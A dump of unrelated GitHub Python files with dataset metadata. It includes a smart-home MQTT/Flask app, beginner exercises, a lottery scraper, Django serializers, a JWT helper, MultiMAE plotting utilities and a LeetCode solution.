if data is None:\n mqtt_dbconn.insert(\"appliance_uptime\", [\"appliance_id\", \"uptime\", \"date\"], [json_message[\"appliance_id\"], int(json_message[\"uptime\"]), today])\n else:\n mqtt_dbconn.update(\"appliance_uptime\", [\"uptime\"], [\"appliance_id\", \"date\"], [int(json_message[\"uptime\"]), json_message[\"appliance_id\"], today])\n if message is not None:\n webhook = DiscordWebhook(\n url=os.getenv(\"AUTOMATION_DISCORD_WEBHOOK\"), \n username=\"Home Appliance Bot\"\n )\n embed = DiscordEmbed(\n title=\"Home Appliance Webhook\", \n description=message, \n color=\"03b2f8\",\n url = \"https://dashboard.digitalserver.tech/home_control\"\n )\n webhook.add_embed(embed)\n webhook.execute()\n print(\"Received John's MQTT message: \", msg.payload.decode()) \n if msg.topic == \"/cheryl_node\":\n if (\",\" in message_mqtt and \"Update Wetness Threshold\" not in message_mqtt):\n wetness, light_intensity, temperature = message_mqtt.split(\",\")\n with mqtt_dbconn:\n mqtt_dbconn.insert(\"environment_data\", [\"temperature\", \"wetness\", \"brightness\"], [temperature, wetness, light_intensity])\n if msg.topic == \"/timmy_node\":\n timmyNodeMessage = message_mqtt.split(\",\")\n if timmyNodeMessage[0] == \"history\":\n profileID = timmyNodeMessage[1]\n currentTime = timmyNodeMessage[2]\n currentDate = timmyNodeMessage[3]\n userHeight = timmyNodeMessage[4]\n 
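# the remaining message fields carry the smart-scale reading: weight from the potentiometer, computed BMI, and the in-house flag
            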
potentiometerWeight = timmyNodeMessage[5]\n bmi = timmyNodeMessage[6]\n inHouse = timmyNodeMessage[7]\n \n with mqtt_dbconn:\n mqtt_dbconn.insert(\"History\", [\"profile_id\", \"time\", \"date\", \"height\", \"weight\", \"bmi\", \"in_house\"], [profileID, currentTime, currentDate, userHeight, potentiometerWeight, bmi, inHouse])\n if timmyNodeMessage[0] == \"profile\":\n profileID = timmyNodeMessage[1]\n userHeight = timmyNodeMessage[2]\n potentiometerWeight = timmyNodeMessage[3]\n bmi = timmyNodeMessage[4]\n inHouse = timmyNodeMessage[5]\n \n with mqtt_dbconn:\n mqtt_dbconn.update(\"Profile\", [\"height\", \"weight\", \"bmi\", \"in_house\"], [\"profile_id\"], [userHeight, potentiometerWeight, bmi, inHouse, profileID])\n if timmyNodeMessage[0] == \"stranger\":\n currentTime = timmyNodeMessage[1]\n currentDate = timmyNodeMessage[2]\n strangerMessage = timmyNodeMessage[3]\n \n with mqtt_dbconn:\n mqtt_dbconn.insert(\"Stranger\", [\"time\", \"date\", \"status\"], [currentTime, currentDate, strangerMessage])\n john_message = {\n \"title\": \"Intruder\",\n \"sender\": \"Cloud\",\n }\n client.publish(\"/john_node\", json.dumps(john_message))\n with mqtt_dbconn:\n mqtt_dbconn.update(\"appliance_status\", [\"status\"], [\"appliance_id\"], [1, 1])\n mqtt_dbconn.update(\"appliance_status\", [\"status\"], [\"appliance_id\"], [1, 2])\n mqtt_dbconn.update(\"appliance_status\", [\"status\"], [\"appliance_id\"], [1, 3])\n client.publish(\"/cheryl_node\", \"Spray at intruder\")\n webhook = DiscordWebhook(\n url=os.getenv(\"ALARM_DISCORD_WEBHOOK\"), \n username=\"Security Bot\"\n )\n embed = DiscordEmbed(\n title=\"Security Webhook\", \n description=\"An intruder has been detected!\", \n color=\"03b2f8\",\n url = \"https://dashboard.digitalserver.tech/smart_security\"\n )\n webhook.add_embed(embed)\n webhook.execute()\n print(\"Received Timmy's MQTT message: \", message_mqtt)\n\n# @app.template_filter('config_name_to_id')\n# def config_name_to_id(config_name):\n# return config_name.lower().replace(\" \", \"-\").replace(\"(\", \"9\").replace(\")\", \"0\")\n\ndef query_weather(city):\n\n base_url = 'http://api.weatherapi.com/v1/forecast.json'\n apt = airporttime.AirportTime(iata_code=city)\n\n converted_datetime = apt.from_utc(datetime.datetime.utcnow())\n offset = converted_datetime.strftime(\"%z\")\n timezone = pytz.FixedOffset(int(offset[1:3]) * 60 + int(offset[3:5]))\n given_datetime = converted_datetime.replace(tzinfo=pytz.UTC).astimezone(timezone)\n desired_time = given_datetime.strftime(\"%H\")\n \n params = {\n 'key': os.getenv(\"WEATHER_API_KEY\"),\n 'q': f\"iata:{city}\",\n 'hour': desired_time,\n }\n \n try:\n response = requests.get(base_url, params=params)\n response.raise_for_status() # Raise an exception for HTTP errors\n\n data = response.json()\n # Extract the desired weather information from the response\n will_it_rain = int(data['forecast']['forecastday'][0]['hour'][0]['will_it_rain'])\n chance_of_rain = int(data['forecast']['forecastday'][0]['hour'][0]['chance_of_rain'])\n return [will_it_rain, chance_of_rain]\n except requests.exceptions.RequestException as e:\n print('Error occurred during the API request:', e)\n return None\n\ndef every_minute_function():\n #do something every minute\n print(\"every_minute_function\")\n pass\n\ndef every_hour_ten_offset_function():\n #do something every hour (10 minutes before the next hour)\n will_it_rain, chance_of_rain = query_weather(\"KCH\")\n message = f\"It seems like it will be raining in the next hour. 
Chance of rain: {chance_of_rain}%\" if will_it_rain else f\"It seems like it will not be raining in the next hour. Chance of rain: {chance_of_rain}%\"\n    webhook = DiscordWebhook(\n        url=os.getenv(\"SPRINKLER_DISCORD_WEBHOOK\"), \n        username=\"Weather Notification Bot\"\n    )\n    embed = DiscordEmbed(\n        title=\"Weather Webhook\", \n        description=message, \n        color=\"03b2f8\",\n        url = \"https://dashboard.digitalserver.tech/\"\n    )\n    if (will_it_rain == 1):\n        client.publish(\"/cheryl_node\", \"Gonna Rain\")\n    webhook.add_embed(embed)\n    webhook.execute()\n\ndef every_hour_function():\n    #do something every hour\n    print(\"Hourly function\")\n    pass\n\ndef every_minute_cron_thread():\n    global minute_timer\n    # Run the function every minute\n    if minute_timer is not None:\n        minute_timer.cancel()\n    minute_timer = Timer(60, every_minute_cron_thread)\n    minute_timer.start()\n    every_minute_function()\n\ndef every_hour_ten_offset_cron_thread():\n    global hour_ten_offset_timer\n    # Run the function every hour, 10 minutes before the hour\n    current_time = datetime.datetime.now()\n    # Calculate the time until the next hour\n    time_until_next_hour = (((60 - current_time.minute) * 60) - current_time.second) - 600 # 10 minutes before the next hour\n    if (time_until_next_hour <= 0):\n        time_until_next_hour = 3600\n    print(time_until_next_hour)\n    if hour_ten_offset_timer is not None:\n        hour_ten_offset_timer.cancel()\n    hour_ten_offset_timer = Timer(time_until_next_hour, every_hour_ten_offset_cron_thread)\n    hour_ten_offset_timer.start()\n    every_hour_ten_offset_function()\n\ndef every_hour_cron_thread():\n    global hour_timer\n    # Run the function every hour\n    current_time = datetime.datetime.now()\n    # Calculate the time until the next hour\n    time_until_next_hour = ((60 - current_time.minute) * 60) - current_time.second\n    if hour_timer is not None:\n        hour_timer.cancel()\n    hour_timer = Timer(time_until_next_hour, every_hour_cron_thread)\n    hour_timer.start()\n    every_hour_function()\n\nminute_timer = None\nhour_ten_offset_timer = None\nhour_timer = None\n\nif __name__ == \"__main__\":\n    client = mqtt.Client()\n    mqtt_dbconn = MySQLService(os.getenv(\"CLOUD_DATABASE_HOST\"), os.getenv(\"CLOUD_DATABASE_USERNAME\"), os.getenv(\"CLOUD_DATABASE_PASSWORD\"), os.getenv(\"CLOUD_DATABASE_NAME\"))\n    client.username_pw_set(username=os.getenv(\"CLOUD_MQTT_USERNAME\"), password=os.getenv(\"CLOUD_MQTT_PASSWORD\")) # type: ignore\n    client.on_connect = on_connect \n    client.on_publish = on_publish\n    client.on_message = on_message\n    client.connect(os.getenv(\"CLOUD_MQTT_HOST\"), int(os.getenv(\"CLOUD_MQTT_PORT\")), 60) # type: ignore\n    topic = [(\"/john_node\", 0), (\"/cheryl_node\", 0), (\"/timmy_node\", 0)]\n    client.subscribe(topic)\n    client.loop_start()\n    # sensor_thread = Thread(target=read_serial_input)\n    # sensor_thread.daemon = True\n    # sensor_thread.start()\n    every_minute_cron_thread()\n    every_hour_cron_thread()\n    every_hour_ten_offset_cron_thread()\n    app.run(host=\"0.0.0.0\", port=8080, debug=True, use_reloader=False)\n","repo_name":"JohnChung2002/SmartHomePlus","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"9233117645","text":"import math\r\n\r\ncount_magnolias = int(input())\r\n\r\ncount_hyacinth = int(input())\r\n\r\ncount_roses = int(input())\r\n\r\ncount_cacti = int(input())\r\n\r\nprice_present = float(input())\r\n\r\ncost_magnolias_total = float(count_magnolias * 3.25)\r\n\r\ncost_hyacinth_total = float(count_hyacinth * 4)\r\n\r\ncost_roses_total = float(count_roses * 
3.5)\r\n\r\ncost_cacti_total = float(count_cacti * 8)\r\n\r\ncost_total = float(cost_magnolias_total + cost_hyacinth_total + cost_roses_total +\r\n                   cost_cacti_total)\r\n\r\nprofit_total = float(cost_total * .95)\r\n\r\nif price_present <= profit_total:\r\n    amount_money_left = math.floor(profit_total - price_present)\r\n    print(f\"She is left with {amount_money_left} leva.\")\r\n\r\nelse:\r\n    amount_money_needed = math.ceil(price_present - profit_total)\r\n    print(f\"She will have to borrow {amount_money_needed} leva.\")","repo_name":"Pandam0n1um/SoftUni-Software-Engineering","sub_path":"Programming Basics with Python - May 2021/02-Conditional Statements/Additional/more_7_exer_flower_shop.py","file_name":"more_7_exer_flower_shop.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"25428098378","text":"#!/usr/bin/python3\n\nimport re\n\n\ndef main():\n    project = 0\n    promise = 0\n    lines = open('wap.txt', 'r')\n    for line in lines:\n        match = re.search('pro(ject|mise)', line)\n        if match:\n            group = match.group()\n            if group == 'project':\n                project += 1\n            else:\n                promise += 1\n    print(\"Promise: {} | Project: {}\".format(promise, project), end='\\t')\n\n\nif __name__ == \"__main__\": main()","repo_name":"tahmid-tanzim/problem-solving","sub_path":"regular-expression.py","file_name":"regular-expression.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}{"seq_id":"13224090236","text":"# coding: utf-8\n\nfrom loto_pg import db, public_site\n\nimport sys\n\n# url = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/index.html'\nurl = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/csv/A1021264.CSV'\nurl = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/csv/A1021414.CSV?1568515735489'\n\ncheck_url = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/csv/loto6.csv'\n\nbase_url = 'https://www.mizuhobank.co.jp/retail/takarakuji/loto/loto6/csv/A102'\n\nargs = sys.argv\n\nsite_loto = public_site.Loto()\n# fetch the CSV from Mizuho Bank and set the latest draw number\nsite_loto.set_max_time(check_url, \"A52\")\nprint(site_loto.max_time)\n\n# get the latest draw number stored in postgresql\ndb_loto = db.Loto(\"lotteries\")\nprint(db_loto.max_time)\n\nif len(args) == 2:\n    start = int(args[1])\n    end = start + 1\nelif len(args) > 2:\n    start = int(args[1])\n    end = int(args[2])\nelse:\n    start = db_loto.max_time + 1\n    end = site_loto.max_time + 1\n\nprint(\"start \" + str(start) + \" end \" + str(end))\n\n# for idx in range(db_loto.max_time+1, site_loto.max_time+1):\nfor idx in range(start, end):\n    num = '%04d' % idx\n\n    # self.opener.addheaders = [('User-Agent',\n    #                            'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n    url = base_url + num + \".CSV\"\n\n    site_loto.parse(url, idx)\n\n    if site_loto.data.times == 0:\n        continue\n\n    db_loto.export(site_loto.data)\n    #print(\"data one_unit \" + str(site_loto.data.one_amount))\n","repo_name":"JuichiHirao/LotoScraping","sub_path":"loto_pg/six_csv.py","file_name":"six_csv.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"74183803754","text":"from api.fields import Base64ImageField\nfrom rest_framework.serializers import (\n    IntegerField,\n    ModelSerializer,\n    PrimaryKeyRelatedField,\n    ReadOnlyField,\n    Serializer,\n    SerializerMethodField,\n)\n\nfrom core.validators import 
(\n    validate_ingredients,\n    validate_tags,\n    validate_time,\n)\nfrom recipes.models import (\n    Favorite,\n    Ingredient,\n    IngredientAmount,\n    Recipe,\n    Tag,\n    ShoppingCart,\n)\nfrom users.serializers import CustomUserSerializer, ShortRecipeSerializer\n\n\nclass TagsSerializer(ModelSerializer):\n    \"\"\"Serializer for outputting tags.\"\"\"\n    class Meta:\n        model = Tag\n        fields = '__all__'\n        read_only_fields = ('__all__', )\n\n\nclass IngredientSerializer(ModelSerializer):\n    \"\"\"Serializer for outputting ingredients.\"\"\"\n    class Meta:\n        model = Ingredient\n        fields = '__all__'\n        read_only_fields = ('__all__', )\n\n\nclass IngredientAmountSerializer(ModelSerializer):\n    \"\"\"Serializer for outputting ingredient amounts.\"\"\"\n    id = ReadOnlyField(source='ingredient.id')\n    name = ReadOnlyField(source='ingredient.name')\n    measurement_unit = ReadOnlyField(\n        source='ingredient.measurement_unit'\n    )\n\n    class Meta:\n        model = IngredientAmount\n        fields = ('id', 'name', 'measurement_unit', 'amount')\n\n\nclass AddIngredientSerializer(Serializer):\n    \"\"\"Serializer for adding ingredients.\"\"\"\n    id = PrimaryKeyRelatedField(queryset=Ingredient.objects.all())\n    amount = IntegerField()\n\n\nclass RecipeGetSerializer(ModelSerializer):\n    \"\"\"Serializer for displaying recipes.\"\"\"\n    author = CustomUserSerializer(read_only=True)\n    ingredients = SerializerMethodField(read_only=True)\n    tags = TagsSerializer(many=True, read_only=True)\n    image = Base64ImageField()\n    is_favorited = SerializerMethodField()\n    is_in_shopping_cart = SerializerMethodField()\n\n    class Meta:\n        model = Recipe\n        fields = (\n            'id',\n            'tags',\n            'author',\n            'ingredients',\n            'is_favorited',\n            'is_in_shopping_cart',\n            'name',\n            'image',\n            'text',\n            'cooking_time',\n        )\n        read_only_fields = ('is_favorited', 'is_in_shopping_cart')\n\n    def get_ingredients(self, obj):\n        \"\"\"Get all ingredients of the recipe.\"\"\"\n        queryset = IngredientAmount.objects.filter(recipe=obj).all()\n        return IngredientAmountSerializer(queryset, many=True).data\n\n    def get_presence(self, model, obj):\n        user = self.context.get('request').user\n        if user.is_anonymous:\n            return False\n        return model.objects.filter(user=user, recipe=obj).exists()\n\n    def get_is_favorited(self, obj):\n        \"\"\"Status: whether the recipe is in favorites.\"\"\"\n        return self.get_presence(Favorite, obj)\n\n    def get_is_in_shopping_cart(self, obj):\n        \"\"\"Status: whether the recipe is in the shopping cart.\"\"\"\n        return self.get_presence(ShoppingCart, obj)\n\n\nclass RecipeChangeSerializer(ModelSerializer):\n    \"\"\"Serializer for adding a recipe.\"\"\"\n    tags = PrimaryKeyRelatedField(\n        queryset=Tag.objects.all(), many=True,\n    )\n    ingredients = AddIngredientSerializer(many=True)\n    image = Base64ImageField()\n\n    class Meta:\n        model = Recipe\n        fields = (\n            'ingredients',\n            'tags',\n            'image',\n            'name',\n            'text',\n            'cooking_time',\n        )\n\n    def add_ingredients(self, ingredients_list, recipe):\n        \"\"\"Create unique records: ingredient - recipe - amount.\"\"\"\n        IngredientAmount.objects.bulk_create([\n            IngredientAmount(\n                recipe=recipe,\n                amount=ingredient.get('amount'),\n                ingredient=ingredient.get('id')\n            ) for ingredient in ingredients_list\n        ])\n\n    def validate(self, data):\n        validate_tags(self.initial_data.get('tags'))\n        validate_ingredients(\n            self.initial_data.get('ingredients')\n        )\n        validate_time(\n            self.initial_data.get('cooking_time')\n        )\n        return data\n\n    def create_tags(self, data, recipe):\n        \"\"\"Validate and create the recipe's tags.\"\"\"\n        for tag in data:\n            
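# attach each tag to the recipe's many-to-many tags relation
            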
recipe.tags.add(tag)\n\n    def create(self, validated_data):\n        author = self.context.get('request').user\n        tags = validated_data.pop('tags')\n        ingredients = validated_data.pop('ingredients')\n        recipe = Recipe.objects.create(author=author, **validated_data)\n        self.create_tags(tags, recipe)\n        self.add_ingredients(ingredients, recipe)\n        return recipe\n\n    def to_representation(self, instance):\n        request = self.context.get('request')\n        context = {'request': request}\n        return RecipeGetSerializer(instance, context=context).data\n\n    def update(self, instance, validated_data):\n        instance.tags.clear()\n        IngredientAmount.objects.filter(recipe=instance).delete()\n        self.create_tags(validated_data.pop('tags'), instance)\n        self.add_ingredients(validated_data.pop('ingredients'), instance)\n        return super().update(instance, validated_data)\n\n\nclass FavoriteSerializer(ModelSerializer):\n    \"\"\"\n    Serializer for the favorites list\n    \"\"\"\n    class Meta:\n        model = Favorite\n        fields = ('user', 'recipe')\n\n    def to_representation(self, instance):\n        request = self.context.get('request')\n        context = {'request': request}\n        return ShortRecipeSerializer(\n            instance.recipe, context=context\n        ).data\n","repo_name":"iliya12321/foodgram","sub_path":"backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"15949974930","text":"lst = [1, 2, 3, 4, 5]\n\nprint(lst[0])\nprint(lst[1])\n\nfor item in lst:\n    print(item)\n\nlst = [1, 2, 3, 4, 5]\n\niter_obj = iter(lst)\nprint(iter_obj)\n\nprint(next(iter_obj))\nprint(next(iter_obj))\n\nfor item in iter_obj:\n    print(item)\n\n# print(next(iter_obj))\n# print(iter_obj.__next__())\n\nfor i in iter_obj:\n    print(i)\n\n\nclass SeriesNumber:\n\n    def __init__(self):\n        self.num = 1\n\n    def __iter__(self):\n        return self\n\n    def __next__(self):\n        number = self.num\n        self.num += 1  # i++\n        return number\n\n\nseries_number = SeriesNumber()\n\nprint(series_number.__next__())\n\nfor i in series_number:\n    if i == 10:\n        break\n    print(i)","repo_name":"Habibur-Rahman0927/1_months_Python_Crouse","sub_path":"Python All Day Work/31-05-2021 Days Work/iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"2284702294","text":"# coding:utf-8\n\nfrom rdflib.graph import Graph\nfrom .utils import get_type\nfrom os.path import splitext\n\n\ndef convert2ttl(owl_files):\n    for owl_file in owl_files:\n        graph = Graph()\n        graph.parse(location=owl_file, format=get_type(owl_file))\n        ttl_file = splitext(owl_file)[0] + '.ttl'\n        with open(ttl_file, 'wb') as fp:\n            hoge = graph.serialize(format='turtle')\n            fuga = hoge.encode() if isinstance(hoge, str) else hoge\n            fp.write(fuga)\n            print('>>>', ttl_file)\n","repo_name":"dbcls/umakaparser","sub_path":"umakaparser/scripts/services/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}{"seq_id":"11444049987","text":"\"\"\" Visualization tools for MultiMAE\"\"\"\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as TF\nfrom torchvision.transforms import ToTensor\nfrom einops import rearrange\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nfrom .MultiMAE.utils.data_constants import (\n    
IMAGENET_DEFAULT_MEAN,\n    IMAGENET_DEFAULT_STD,\n)\n\n\ndef get_masked_image(img, mask, image_size=224, patch_size=16, mask_value=0.0):\n    img_token = rearrange(\n        img,\n        \"b c (nh ph) (nw pw) -> b (nh nw) (c ph pw)\",\n        ph=patch_size,\n        pw=patch_size,\n        nh=image_size // patch_size,\n        nw=image_size // patch_size,\n    )\n    img_token[mask != 0] = mask_value\n    img = rearrange(\n        img_token,\n        \"b (nh nw) (c ph pw) -> b c (nh ph) (nw pw)\",\n        ph=patch_size,\n        pw=patch_size,\n        nh=image_size // patch_size,\n        nw=image_size // patch_size,\n    )\n    return img\n\n\ndef plot_semseg_gt(input_dict, ax=None, image_size=224):\n    \"\"\"Simplified plotting of semseg images\n\n    Args:\n        input_dict (dict): batch of task tensors containing a 'semseg' map.\n        ax (matplotlib axes, optional): axes to draw on. Defaults to None.\n        image_size (int, optional): output resolution. Defaults to 224.\n    \"\"\"\n    semseg = F.interpolate(\n        input_dict[\"semseg\"].cpu().detach().float().unsqueeze(1),\n        size=(image_size, image_size),\n        mode=\"nearest\",\n    ).long()[0, 0]\n\n    ax.imshow(semseg)\n\n\ndef plot_semseg_gt_masked(input_dict, mask, ax=None, mask_value=1.0, image_size=224):\n    semseg = F.interpolate(\n        input_dict[\"semseg\"].cpu().detach().float().unsqueeze(1),\n        size=(image_size, image_size),\n        mode=\"nearest\",\n    ).long()\n    masked_img = get_masked_image(\n        semseg.float() / 255.0,\n        mask,\n        image_size=image_size,\n        patch_size=16,\n        mask_value=mask_value,\n    )\n    masked_img = masked_img[0].permute(1, 2, 0)\n    ax.imshow(masked_img)\n\n\ndef plot_semseg_pred_masked(semseg_preds, semseg_gt, mask, ax=None, image_size=224):\n    semseg = get_pred_with_input(\n        semseg_gt.unsqueeze(1),\n        semseg_preds.argmax(1).unsqueeze(1),\n        mask,\n        image_size=image_size // 4,\n        patch_size=4,\n    )\n    semseg = (\n        F.interpolate(semseg.float(), size=(image_size, image_size), mode=\"nearest\")[\n            0, 0\n        ]\n        .long()\n        .cpu()\n    )\n    ax.imshow(semseg)\n\n\ndef denormalize(img, mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD):\n    return TF.normalize(\n        img.clone(), mean=[-m / s for m, s in zip(mean, std)], std=[1 / s for s in std]\n    )\n\n\ndef get_pred_with_input(gt, pred, mask, image_size=224, patch_size=16):\n    gt_token = rearrange(\n        gt,\n        \"b c (nh ph) (nw pw) -> b (nh nw) (c ph pw)\",\n        ph=patch_size,\n        pw=patch_size,\n        nh=image_size // patch_size,\n        nw=image_size // patch_size,\n    )\n    pred_token = rearrange(\n        pred,\n        \"b c (nh ph) (nw pw) -> b (nh nw) (c ph pw)\",\n        ph=patch_size,\n        pw=patch_size,\n        nh=image_size // patch_size,\n        nw=image_size // patch_size,\n    )\n    pred_token[mask == 0] = gt_token[mask == 0]\n    img = rearrange(\n        pred_token,\n        \"b (nh nw) (c ph pw) -> b c (nh ph) (nw pw)\",\n        ph=patch_size,\n        pw=patch_size,\n        nh=image_size // patch_size,\n        nw=image_size // patch_size,\n    )\n    return img\n\n\ndef plot_predictions(input_dict, preds, masks, image_size=224):\n    masked_rgb = (\n        get_masked_image(\n            denormalize(input_dict[\"rgb\"]),\n            masks[\"rgb\"],\n            image_size=image_size,\n            mask_value=1.0,\n        )[0]\n        .permute(1, 2, 0)\n        .detach()\n        .cpu()\n    )\n    masked_depth = (\n        get_masked_image(\n            input_dict[\"depth\"],\n            masks[\"depth\"],\n            image_size=image_size,\n            mask_value=np.nan,\n        )[0, 0]\n        .detach()\n        .cpu()\n    )\n\n    # todo: remove this?\n    pred_rgb = denormalize(preds[\"rgb\"])[0].permute(1, 2, 0).clamp(0, 1)\n    pred_depth = preds[\"depth\"][0, 0].detach().cpu()\n\n    pred_rgb2 = (\n        get_pred_with_input(\n            denormalize(input_dict[\"rgb\"]),\n            denormalize(preds[\"rgb\"]).clamp(0, 1),\n            masks[\"rgb\"],\n            image_size=image_size,\n        )[0]\n        .permute(1, 2, 0)\n        .detach()\n        .cpu()\n    )\n    pred_depth2 = (\n        
get_pred_with_input(\n            input_dict[\"depth\"], preds[\"depth\"], masks[\"depth\"], image_size=image_size\n        )[0, 0]\n        .detach()\n        .cpu()\n    )\n\n    fig = plt.figure(figsize=(10, 10))\n    grid = ImageGrid(fig, 111, nrows_ncols=(3, 3), axes_pad=0)\n\n    grid[0].imshow(masked_rgb)\n    grid[1].imshow(pred_rgb2)\n    grid[2].imshow(denormalize(input_dict[\"rgb\"])[0].permute(1, 2, 0).detach().cpu())\n\n    grid[3].imshow(masked_depth)\n    grid[4].imshow(pred_depth2)\n    grid[5].imshow(input_dict[\"depth\"][0, 0].detach().cpu())\n\n    # semseg plotting\n    # plot_semseg_gt_masked(\n    #     input_dict,\n    #     masks[\"semseg\"],\n    #     grid[6],\n    #     mask_value=1.0,\n    #     image_size=image_size,\n    # )\n    # plot_semseg_pred_masked(\n    #     preds[\"semseg\"],\n    #     input_dict[\"semseg\"],\n    #     masks[\"semseg\"],\n    #     grid[7],\n    #     image_size=image_size,\n    # )\n    # plot_semseg_gt(input_dict, grid[8], image_size=image_size)\n\n    for ax in grid:\n        ax.set_xticks([])\n        ax.set_yticks([])\n\n    fontsize = 16\n    grid[0].set_title(\"Masked inputs\", fontsize=fontsize)\n    grid[1].set_title(\"MultiMAE predictions\", fontsize=fontsize)\n    grid[2].set_title(\"Original Reference\", fontsize=fontsize)\n    grid[0].set_ylabel(\"RGB\", fontsize=fontsize)\n    grid[3].set_ylabel(\"Depth\", fontsize=fontsize)\n\n    # semseg plotting\n    grid[6].set_ylabel(\"Semantic\", fontsize=fontsize)\n    # todo: more efficient ways to plot images in tensor board\n    # buf = io.BytesIO()\n    # plt.savefig(buf, format=\"png\")\n    # plt.close(fig)\n    # buf.seek(0)\n\n    # # decode the array into an image\n    # # todo: use pillow-simd in future\n    # image_grid = PIL.Image.open(buf)\n    # image_grid = ToTensor()(image_grid)\n    return fig\n","repo_name":"microsoft/perception-benchmark","sub_path":"models/MultiMAE/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":6211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"23033917771","text":"def prod(string):\n    total = 0\n    price = {\n        'A':{\n            1: 35,\n            4: 100\n        },\n        'B':{\n            1:65\n        },\n        'C':{\n            1:50,\n            6:250\n        },\n        'D':{\n            1:85\n        }\n    }\n    count = {e:string.count(e) for e in set(string)}\n    for c in sorted(count):\n        remaining = count[c]\n        # apply price tiers from the largest bundle down to single units\n        for k, v in sorted(price[c].items(), reverse=True):\n            total += (remaining // k) * v\n            remaining %= k\n    return total\n\n\nprint(prod('ABCADABAA'))\nprint(prod('CCCACCCC'))\nprint(prod('ABCD'))\n","repo_name":"Amit2197/ProgramingSolved","sub_path":"Accenture/productcode.py","file_name":"productcode.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"30132612476","text":"import time\nfrom datetime import datetime\n\nfrom fastapi import HTTPException, status\nfrom jose import jwt, JWTError\nfrom database.connection import Settings\n\nsettings = Settings()\n\n\ndef create_access_token(user: str):\n    payload = {\"user\": user, \"expires\": time.time() + 3600}\n\n    token = jwt.encode(\n        payload, settings.SECRET_KEY, algorithm=\"HS256\"\n    )  # payload to encode, key used to sign it, signing/encryption algorithm\n    return token\n\n\ndef verify_access_token(token: str):\n    try:\n        data = jwt.decode(token, settings.SECRET_KEY, algorithms=[\"HS256\"])\n        expire = data.get(\"expires\")  # check that an expiry time exists\n\n        if expire is None:\n            raise HTTPException(\n                status_code=status.HTTP_400_BAD_REQUEST,\n                detail=\"No access token supplied\",\n            )\n        if datetime.utcnow() > datetime.utcfromtimestamp(expire):  # check whether the token has expired\n            raise HTTPException(\n                
status_code=status.HTTP_403_FORBIDDEN, detail=\"Token expired!\"\n            )\n        return data\n\n    except JWTError:\n        raise HTTPException(\n            status_code=status.HTTP_400_BAD_REQUEST, detail=\"Invalid token\"\n        )\n","repo_name":"limstonestone/fastapi-web-tutorial","sub_path":"planner/auth/jwt_handler.py","file_name":"jwt_handler.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"24781723752","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom model import clean, run_model\n\napp = Flask(__name__)\nCORS(app)\n\n\n# GET request route\n@app.route('/api/data', methods=['GET'])\ndef get_data():\n    # Process GET request and return response\n    data = {'message': 'Hello from the backend!'}\n    return jsonify(data)\n\n# POST request route -> takes posts from frontend + user preferences & returns triggering posts only\n@app.route('/api/submit', methods=['POST'])\ndef submit_data(): \n\n    submitted_data = request.json\n    print(submitted_data)\n    print(\"triggers :\", submitted_data['triggers'])\n    print(\"threshold :\", submitted_data['threshold'])\n\n    # clean posts\n    cleaned_data = clean(submitted_data['data'])\n\n    # get user prefs\n    triggers = submitted_data['triggers']\n    threshold = submitted_data['threshold']\n\n    # get labels based off of post & user prefs\n    probability_data = run_model(cleaned_data, triggers, threshold)\n\n    # return the processed result\n    return probability_data\n\nif __name__ == '__main__':\n    app.run()","repo_name":"BrendaNamuh/Hide-It","sub_path":"chrome-ext/backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"26215547641","text":"# https://leetcode.com/problems/next-greater-node-in-linked-list/\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def nextLargerNodes(self, head: ListNode) -> List[int]:\n        st = []\n        m = {}\n        ptr = head\n        idx = 0\n        while ptr is not None:\n            while len(st) > 0 and ptr.val > st[-1][1]:\n                m[st[-1][0]] = ptr.val\n                st.pop()\n            st.append((idx, ptr.val))\n            ptr = ptr.next\n            idx += 1\n\n        n = idx\n        res = [0 for i in range(n)]\n        for k, v in m.items():\n            res[k] = v\n        return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1001-1500/1019_next-greater-node-in-linked-list_1_AC.py","file_name":"1019_next-greater-node-in-linked-list_1_AC.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"}{"seq_id":"6757464826","text":"import socket\nimport json\nimport 